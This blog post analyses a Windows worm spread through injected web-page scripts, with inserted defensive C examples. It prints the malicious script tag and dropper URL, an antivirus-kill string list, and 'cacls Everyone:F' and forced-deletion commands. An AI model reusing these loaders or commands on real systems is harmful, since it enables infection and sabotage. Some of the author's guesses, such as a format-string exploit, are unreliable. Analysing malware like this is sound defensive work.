In the last few days there has been an attack by a Chinese hacker on computer networks in Vietnam. When surfing the Internet, especially on Vietnamese websites, many people see advertisements for Chinese websites appearing on the pages. There's a rumour going around that this attack is related to the recent clash between China and Vietnam over some islands, but I'm in no position to discuss that :P
Anyway, as a patriot, I decided to make everything clear once and for all. By checking the source code of the affected pages, I found the following piece of code "injected" into them:
<script src=http://121.15.220.104/1.js></script>
I came to the conclusion that this was a man-in-the-middle attack, in which the hacker pwnzored a node somewhere between the victim computers and the host and filtered the content on the fly. After doing some research on Google, I found that this is done with a virus that infects a computer, turns it into a gateway by faking the MAC address, and then filters everything that goes through it (this method is called ARP spoofing). I also found a program that is probably the evil thing spreading the virus over the network: http://121.15.220.104/Setup.exe.
I decided to have a look at it. After some unpacking, I was able to load it in OllyDbg. I can tell this virus is really dangerous. It kills every anti-virus program you have in an instant. The presence of all those %c shows that it is using a buffer overflow/format string exploit, which is very effective against a naive operating system like Windows. It also opens some ports on your computer: 135, 139, 445, 1026 and 5152. You would be amazed to see the string table:
Address Disassembly Text string
004016B4 PUSH Setup.0040B058 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004016C5 PUSH Setup.0040B054 ASCII " ""
0040175E PUSH Setup.0040B04C ASCII "\*"
004017E4 PUSH Setup.0040B040 ASCII ".."
004019C6 MOV EDI,Setup.0040B100 ASCII "%c%c%c"
00401AC1 PUSH Setup.0040B040 ASCII ".."
00401B24 PUSH Setup.0040B0F8 ASCII "360"
00401B3A MOV EAX,Setup.0040B0F4 ASCII "AD"
00401BAB MOV EAX,Setup.0040B0F0 ASCII "GO"
00401C45 PUSH Setup.0040B0EC ASCII ".js"
00401CC6 PUSH Setup.0040B0E8 ASCII "exe"
00401D2A PUSH Setup.0040B0E4 ASCII "\~"
00401E4A PUSH Setup.0040B0E0 ASCII "rar"
00401E5E PUSH Setup.0040B0DC ASCII "zip"
00401E9E CMP DWORD PTR SS:[EBP-1EC],500000 ASCII "Actx "
00401EE1 PUSH Setup.0040B0D4 ASCII "\bak\"
00401F5F PUSH Setup.0040B0CC ASCII " X ""
00401F6A PUSH Setup.0040B0C8 ASCII "" ""
00401F95 PUSH Setup.0040B0B4 ASCII "" -r -inul -ibck -y"
0040203C PUSH Setup.0040B0D4 ASCII "\bak\"
004020BE PUSH Setup.0040B0D4 ASCII "\bak\"
00402108 PUSH Setup.0040B0AC ASCII " A ""
00402113 PUSH Setup.0040B0C8 ASCII "" ""
00402138 PUSH Setup.0040B084 ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"
00402230 PUSH Setup.0040B080 ASCII "ddd"
00402285 PUSH Setup.0040B0D4 ASCII "\bak\"
0040255D PUSH Setup.0040B11C ASCII "^|"
004025B0 PUSH Setup.0040B10C ASCII "cmd.exe /c ""
0040279B PUSH Setup.0040B120 ASCII "%c:\"
00402974 PUSH Setup.0040B284 ASCII "ieframe"
00402988 PUSH Setup.0040B274 ASCII "cabinetwclass"
0040299C PUSH Setup.0040B25C ASCII "mozillauiwindowclass"
004029B0 PUSH Setup.0040B254 ASCII "metapad"
004029C5 PUSH Setup.0040B24C ASCII "dr.web"
004029DB PUSH Setup.0040B244 ASCII "avg "
00402A03 PUSH Setup.0040B230 ASCII "tapplication"
00402A27 PUSH Setup.0040B220 ASCII "AfxMDIFrame42s"
00402A3A PUSH Setup.0040B218 ASCII "360safe"
00402A50 PUSH Setup.0040B218 ASCII "360safe"
00402A66 PUSH Setup.0040B210 ASCII "360anti"
00402A7C PUSH Setup.0040B208 ASCII "afx:"
00402AAB MOV EDI,Setup.0040B200 ASCII "#32770"
00402AD2 PUSH Setup.0040B1E8 ASCII "thunderrt6main"
00402AF8 PUSH Setup.0040B1E0 ASCII "antivir"
00402B3A PUSH Setup.0040B1C8 ASCII "kvxp"
00402BC4 PUSH Setup.0040B198 ASCII "thunderrt6formdc"
00402BDE PUSH Setup.0040B188 ASCII "ThunderRT6Timer"
00402BF1 PUSH Setup.0040B180 ASCII "ewido"
00402C07 PUSH Setup.0040B178 ASCII "escan"
00402C1D PUSH Setup.0040B170 ASCII "mcagent"
00402C7E PUSH Setup.0040B158 ASCII "bitdefender"
00402C99 PUSH Setup.0040B148 ASCII "facelesswndproc"
00402D3A PUSH Setup.0040B130 ASCII "##vso##"
00402D4D PUSH Setup.0040B128 ASCII "avast"
00402E58 PUSH Setup.0040B0E8 ASCII "exe"
00402FAE PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403005 PUSH Setup.0040B9A4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403046 PUSH Setup.0040B96C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403057 MOV EDI,Setup.0040B968 ASCII "XOR"
00403098 PUSH Setup.0040B200 ASCII "#32770"
00403122 PUSH Setup.0040B960 ASCII "xxpin"
004031C5 PUSH Setup.0040B8B0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004032A4 PUSH Setup.0040B7D4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004032FC PUSH Setup.0040B96C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403323 PUSH Setup.0040B7C8 ASCII "%c%c%c%c%c"
00403355 PUSH Setup.0040B7B4 ASCII "%c%c%c%c%c%c%c%c%c"
00403385 PUSH Setup.0040B7A0 ASCII "%c%c%c%c%c%c%c%c"
0040342C PUSH Setup.0040B744 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004034A2 PUSH Setup.0040B738 ASCII "%s\cmd.exe"
004034D7 PUSH Setup.0040B730 ASCII "%s\com"
004034F1 PUSH Setup.0040B728 ASCII "%s\%s"
0040352D PUSH Setup.0040B718 ASCII "pagefile.pif"
00403544 PUSH Setup.0040B708 ASCII "CabinetWClass"
00403897 PUSH Setup.0040B688 ASCII "%c%c%ct%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004038D3 PUSH Setup.0040B678 ASCII "Common Startup"
004038F9 PUSH Setup.0040B728 ASCII "%s\%s"
00403989 PUSH Setup.0040B61C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004039F2 PUSH Setup.0040B614 ASCII ".exe"
00403AA0 PUSH Setup.0040B5DC ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403B14 PUSH Setup.0040B614 ASCII ".exe"
00403B6E PUSH Setup.0040B5D0 ASCII "\rar.exe"
00403B73 PUSH Setup.0040B5C4 ASCII "\winrar.exe"
00403C0C PUSH Setup.0040B544 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403CA2 PUSH Setup.0040B4F0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00403D19 PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403D3A PUSH Setup.0040B4E0 ASCII ":F"
00403D52 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403D7F PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403D93 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403DCC PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403DF1 PUSH Setup.0040B4E0 ASCII ":F"
00403E09 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403E72 PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403E8A PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403EDB PUSH Setup.0040B4E4 ASCII " /e /t /g "
00403F00 PUSH Setup.0040B4E0 ASCII ":F"
00403F18 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00403F81 PUSH Setup.0040B4BC ASCII " /e /t /g Everyone:F"
00403F99 PUSH Setup.0040B4D4 ASCII "cacls.exe"
00404053 PUSH Setup.0040B4B0 ASCII "\ntfsus.exe"
004040BC PUSH Setup.0040B4AC ASCII "pac"
00404190 PUSH Setup.0040B4A8 ASCII " ^"
00404212 PUSH Setup.0040B614 ASCII ".exe"
0040424F PUSH Setup.0040B49C ASCII ".exe.log"
0040426C PUSH Setup.0040B4A8 ASCII " ^"
004042EE PUSH Setup.0040B494 ASCII "%s.~"
004042FF PUSH Setup.0040B48C ASCII "%s.exe"
0040436D MOV EDI,Setup.0040B484 ASCII ".log"
0040444D PUSH Setup.0040B47C ASCII "\netc"
0040445E PUSH Setup.0040B474 ASCII "fg.000"
0040446B PUSH Setup.0040B468 ASCII "\netcfg.dll"
004044A8 PUSH Setup.0040B464 ASCII "#32"
004044B5 PUSH Setup.0040B460 ASCII "770"
00404569 PUSH Setup.0040B450 ASCII "CNJBlaipbofF"
004045BE PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
004045F3 PUSH Setup.0040B120 ASCII "%c:\"
004046B0 PUSH Setup.0040B414 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004046D7 PUSH Setup.0040B728 ASCII "%s\%s"
00404744 PUSH Setup.0040B408 ASCII "%s\boot.ini"
00404822 PUSH Setup.0040B400 ASCII "\bak"
0040489A PUSH Setup.0040B3E0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004048B8 PUSH Setup.0040B728 ASCII "%s\%s"
004048F1 PUSH Setup.0040B7A0 ASCII "%c%c%c%c%c%c%c%c"
0040490C PUSH Setup.0040B728 ASCII "%s\%s"
00404949 PUSH Setup.0040B3C8 ASCII "%c%c%c%c%c%c%c%c%c%c"
00404973 PUSH Setup.0040B728 ASCII "%s\%s"
004049BA PUSH Setup.0040B400 ASCII "\bak"
004049DB PUSH Setup.0040B400 ASCII "\bak"
00404A15 PUSH Setup.0040B400 ASCII "\bak"
00404A60 PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00404B7A PUSH Setup.0040B2AC ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%"...
00404EE6 PUSH Setup.0040BA38 ASCII "ping.exe -f -n 1 www.baidu.com"
00405004 PUSH Setup.0040BA5C ASCII "rb"
00405077 PUSH Setup.0040BA5C ASCII "rb"
00405117 PUSH Setup.0040BA58 ASCII "wb"
00405229 MOV DWORD PTR SS:[ESP],Setup.0040BA5C ASCII "rb"
00405648 MOV DWORD PTR SS:[ESP],Setup.0040BA5C ASCII "rb"
00405669 PUSH Setup.0040BA58 ASCII "wb"
0040578F PUSH Setup.0040BA60 ASCII "cmd.exe /c del /F /Q ""
00405800 PUSH Setup.0040BA58 ASCII "wb"
004059E7 PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
00405A38 PUSH Setup.0040B7B4 ASCII "%c%c%c%c%c%c%c%c%c"
00405A52 MOV ESI,Setup.0040BB9C ASCII "\n"
00405A87 PUSH Setup.0040B414 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405AD1 PUSH Setup.0040BB70 ASCII "%c%c%c%c%c%c%c%c%c%c%c%s%s%c%c%c%c"
00405B2E PUSH Setup.0040BB30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405B79 PUSH Setup.0040BB04 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405BD6 PUSH Setup.0040BAC0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s%s%s%s%c%c%c%c"
00405C37 PUSH Setup.0040BA78 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00405D5C PUSH Setup.0040BBA0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c"
00405EDF PUSH Setup.0040B120 ASCII "%c:\"
00405F11 MOV EBP,Setup.0040B400 ASCII "\bak"
0040602B PUSH Setup.0040B438 ASCII "%c%c%c%c%c%c%c%c%c%c%c"
0040606C PUSH Setup.0040BBA0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c"
00406099 PUSH Setup.0040B120 ASCII "%c:\"
00406241 PUSH Setup.0040BE90 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
0040628F PUSH Setup.0040B3E0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406391 PUSH Setup.0040BDE4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406476 PUSH Setup.0040BD30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406553 PUSH Setup.0040BDE4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406634 PUSH Setup.0040BD30 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004066FD PUSH Setup.0040BC9C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
004067BD PUSH Setup.0040BE90 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406814 PUSH Setup.0040BC74 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
0040690C PUSH Setup.0040BBD4 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406950 MOV EDI,Setup.0040BBCC ASCII "Type"
0040696D MOV EBX,Setup.0040BBC4 ASCII "radio"
004069E2 PUSH Setup.0040BBBC ASCII "IEFrame"
00406A43 PUSH Setup.0040B9C0 ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406B62 PUSH Setup.0040BF0C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406CA3 PUSH Setup.0040BF3C ASCII "%c%c%c%c%c%c%c%c%c%c%c%c%c%c"
00406CB4 PUSH Setup.0040B968 ASCII "XOR"
004073DB SUB ESP,68 (Initial CPU selection)
00407539 PUSH 10000 UNICODE "=::=::\"
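As an added example (my own code, not from the post), here is what those %c runs look like from both sides: a packed binary assembles a string one character at a time with sprintf, so the real text never appears in the string table, and an analyst who notes the integers pushed before the call can rebuild it. Runs of %c very commonly reflect this string-hiding technique rather than a format-string exploit, and the literal 't' in the dump's "%c%c%ct%c..." entry is handled too. The string "notepad.exe" is a constructed stand-in; the real hidden strings are not known from the dump.

```c
#include <stdio.h>
#include <string.h>

/* Analyst-side helper: expand a format string that uses only %c conversions
 * and literal text, given the integer arguments that the disassembly shows
 * being pushed before the sprintf call. Returns the output length, or -1 if
 * the format needs a conversion this helper does not model (e.g. %s), the
 * arguments run out, or the output buffer is too small. */
int expand_char_fmt(const char *fmt, const int *args, int nargs,
                    char *out, size_t outsz)
{
    size_t n = 0;
    int used = 0;
    for (const char *p = fmt; *p != '\0'; p++) {
        char ch;
        if (*p == '%') {
            p++;
            if (*p == 'c') {
                if (used >= nargs) return -1;
                ch = (char)args[used++];
            } else if (*p == '%') {
                ch = '%';
            } else {
                return -1;                /* %s, %d, ... not modelled here */
            }
        } else {
            ch = *p;                      /* literal text, like the 't' in "%c%c%ct" */
        }
        if (n + 1 >= outsz) return -1;
        out[n++] = ch;
    }
    out[n] = '\0';
    return (int)n;
}

/* Convenience wrapper: does the recovered string match what we expected? */
int recovered_equals(const char *fmt, const int *args, int nargs,
                     const char *expected)
{
    char buf[256];
    return expand_char_fmt(fmt, args, nargs, buf, sizeof buf) >= 0 &&
           strcmp(buf, expected) == 0;
}

/* What the packed binary does at run time: only the "%c" run and the pushed
 * character codes exist in the file; "notepad.exe" (constructed stand-in)
 * is never stored as a literal, so a string listing cannot show it. */
const char *build_at_runtime(char *buf, size_t bufsz)
{
    snprintf(buf, bufsz, "%c%c%c%c%c%c%c%c%c%c%c",
             'n', 'o', 't', 'e', 'p', 'a', 'd', '.', 'e', 'x', 'e');
    return buf;
}
```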
As I'm running out of time tonight, let's leave the detailed analysis of the virus for later and get to the removal instructions. If you look at the running processes under Security Task Manager, you'll see that the virus is impersonating lsass.exe and smss.exe, running copies with the same names from C:\Windows\system32\com\. It probably also wants to hijack your browser with ljjijgf.dll in C:\Windows\system32\. Get rid of them and you're safe :)
Update: as discovered by my little brother, you also need to get rid of two other fake files: rar.exe and alg.exe, somewhere in the Windows directory.
Update 2: the virus has been identified as W32.Dashfer.Worm by BKIS. You can use BKAV to wipe the virus from your computer.
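To check a process list for the impersonation described above, here is an added example (my own code, not from the post and not BKAV's logic): it flags any image named lsass.exe, smss.exe or alg.exe whose directory is not \Windows\system32, so a copy in system32\com is reported while the genuine one is not. It assumes a standard C:\Windows install; rar.exe is left out because a legitimate copy has no fixed location.

```c
#include <ctype.h>
#include <string.h>

/* Names the post says the worm reuses, paired with the only directory a
 * genuine copy runs from (assumes a standard Windows install). */
static const struct { const char *name; const char *expected_dir; } SYSTEM_NAMES[] = {
    { "lsass.exe", "\\windows\\system32" },
    { "smss.exe",  "\\windows\\system32" },
    { "alg.exe",   "\\windows\\system32" },
};

/* Case-insensitive compare with '/' and '\' treated alike. */
static int path_eq(const char *a, const char *b)
{
    for (;; a++, b++) {
        int ca = tolower((unsigned char)*a), cb = tolower((unsigned char)*b);
        if (ca == '/') ca = '\\';
        if (cb == '/') cb = '\\';
        if (ca != cb) return 0;
        if (ca == '\0') return 1;
    }
}

/* Returns 1 if image_path carries a tracked system-process name but does not
 * live in that process's real directory (e.g. ...\system32\com\lsass.exe),
 * 0 if the name is not tracked or the location is the genuine one. The drive
 * letter is dropped; the rest must match exactly, so system32\com is flagged. */
int is_masquerading(const char *image_path)
{
    const char *sep = strrchr(image_path, '\\');
    const char *sep2 = strrchr(image_path, '/');
    if (sep2 != NULL && (sep == NULL || sep2 > sep)) sep = sep2;
    if (sep == NULL) return 0;                 /* no directory: not judged */
    const char *name = sep + 1;
    size_t dirlen = (size_t)(sep - image_path);
    char dir[260];
    if (dirlen >= sizeof dir) return 0;
    memcpy(dir, image_path, dirlen);
    dir[dirlen] = '\0';
    const char *d = dir;
    if (isalpha((unsigned char)d[0]) && d[1] == ':') d += 2;   /* drop "C:" */
    for (size_t i = 0; i < sizeof SYSTEM_NAMES / sizeof SYSTEM_NAMES[0]; i++)
        if (path_eq(name, SYSTEM_NAMES[i].name))
            return !path_eq(d, SYSTEM_NAMES[i].expected_dir);
    return 0;
}
```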
And finally, some images for your curious eyes: